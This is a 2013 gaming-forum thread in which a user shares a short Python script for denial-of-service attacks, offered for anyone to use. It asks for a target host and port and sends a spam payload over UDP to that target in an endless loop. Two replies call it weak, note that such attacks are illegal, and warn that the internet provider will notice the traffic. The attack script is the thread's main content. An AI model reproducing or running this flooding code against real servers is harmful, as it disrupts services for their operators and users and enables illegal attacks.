BullyWiiHacks
Welcome dear guest! Very Happy

To start posting and being part of the BWH community, you simply need to register an account or log into an existing one.

If you do not wish to register at all, that's fine but there will be more advertisements. :/

You can probably see and download most content provided for regular members even without an account.

Your contributions will be greatly appreciated though, give it a shot and register today! thumbsup

Join the forum, it's quick and easy

BullyWiiHacks
Welcome dear guest! Very Happy

To start posting and being part of the BWH community, you simply need to register an account or log into an existing one.

If you do not wish to register at all, that's fine but there will be more advertisements. :/

You can probably see and download most content provided for regular members even without an account.

Your contributions will be greatly appreciated though, give it a shot and register today! thumbsup
BullyWiiHacks
Would you like to react to this message? Create an account in a few clicks or log in to continue.
BullyWiiHacks

Gaming, Modding & Programming

Important reminders:

- Click *HERE* for advanced forum search or check out the text field below on the front page for Google before posting
- NO support via private message (use the forum)
- Write meaningful topic titles
Site Translation
Latest topics
» Dropped Out of College to Pursue Web Dev and Life Pursuits in General
Python Dos Program Empty4/7/2024, 2:34 pm by SnB@BWH

» Bully Made It Into a BIG Video 400K Views
Python Dos Program Empty4/7/2024, 6:58 am by Bully@WiiPlaza

» Wii Play Tanks
Python Dos Program Empty3/24/2024, 2:46 pm by helpmeout

» [Bypass Paywalls] (Global) @magnolia1234 - GitLab
Python Dos Program Empty3/18/2024, 3:55 am by Seth@WiiPlaza

» [Download] Mary Shelley's Frankenhole
Python Dos Program Empty3/16/2024, 8:29 am by Seth@WiiPlaza

» Completely Custom Modded Controllers (Undetectable)
Python Dos Program Empty3/5/2024, 1:55 pm by Shadow@BWH

» (Zombies) Drink perks code?
Python Dos Program Empty3/5/2024, 1:24 pm by Shadow@BWH

» Die Rückkehr zu STEAM und WARFACE
Python Dos Program Empty3/2/2024, 3:54 am by Seth@WiiPlaza

» First person hand model change?
Python Dos Program Empty2/28/2024, 4:53 am by Ad3lamac611

» {RELEASE} Field Raider Firefox v1.72 by Seth@WiiPlaza
Python Dos Program Empty2/21/2024, 8:52 am by naxil

Search
 
 

Display results as :
 


Rechercher Advanced Search

May 2024
MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  

Calendar Calendar

Country Statistics
Free counters!

You are not connected. Please login or register

Python Dos Program

3 posters

Go down  Message [Page 1 of 1]

1Python Dos Program Empty Python Dos Program 12/5/2013, 4:22 pm

deathx

avatar

Heres a little program for preforming dos attacks on computers/servers that I wrote I don't even know if it will actually work well.

1. I am not responsible for if it actually crashes a server or something.

2. Do whatever you want with it you can modify it, distribute it whatever as long as you don't take credit for it (unless if its modified you can take some of the credit not all).

Source:
Code:
import socket
host = input("Enter host to be dosed:")
port = int(input("Please enter on witch port:"))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((host, port))
input("Press enter when ready")
print("Dossing...")
text = bytes("SPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAMSPAM", 'utf-8')
while True:
    sock.send(text)
print("Dosing stoped")
Note: I tried attaching a zip file with the program in it but I don't think it worked.

USE AT YOUR OWN RISK



Last edited by deathx on 12/6/2013, 4:02 pm; edited 3 times in total (Reason for editing : Fixed the code and made it better)

2Python Dos Program Empty Re: Python Dos Program 12/5/2013, 5:00 pm

[LKWP]FALADOR

avatar

That is not a DDos and that is about as effective as a ping flood. What you are trying to attempt is a DoS (Denial Of Service) attack which involves one attacker taking down a server/host which can not be done normally unless the server is "apache" based. A DDos (Distributed-Denial-Of-Service) attack involves multiple attackers flooding one server which the more there are, the better the results are going to be. Here is a fact, "In multiple countries Denial-of-service or Distributed-Denial-Of-Service is illegal and can result in time in prison. This information is for educational purposes only me, and the other members of this website affiliated with this forum are not responsible for the misuse of this information. I notice yours says DoS* but I just don't want you to get confused Razz
P.S. Don't support Criminal activity
Evil or Very Mad

3Python Dos Program Empty Re: Python Dos Program 12/5/2013, 5:06 pm

deathx

avatar

[LKWP]FALADOR wrote:That is not a DDos and that is about as effective as a ping flood. What you are trying to attempt is a DoS (Denial Of Service) attack which involves one attacker taking down a server/host which can not be done normally unless the server is "apache" based. A DDos (Distributed-Denial-Of-Service) attack involves multiple attackers flooding one server which the more there are, the better the results are going to be. Here is a fact, "In multiple countries Denial-of-service or Distributed-Denial-Of-Service is illegal and can result in time in prison. This information is for educational purposes only me, and the other members of this website affiliated with this forum are not responsible for the misuse of this information. I notice yours says DoS* but I just don't want you to get confused Razz
P.S. Don't support Criminal activity
Evil or Very Mad
Yeah I know the difference and as I said USE AT YOUR OWN RISK

4Python Dos Program Empty Re: Python Dos Program 12/8/2013, 2:52 pm

TheDetonator

TheDetonator
Trusted Member
Trusted Member

If this is flooding something with ping requests (im guessing), your internet provider will realize your sending this.

Sponsored content



Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum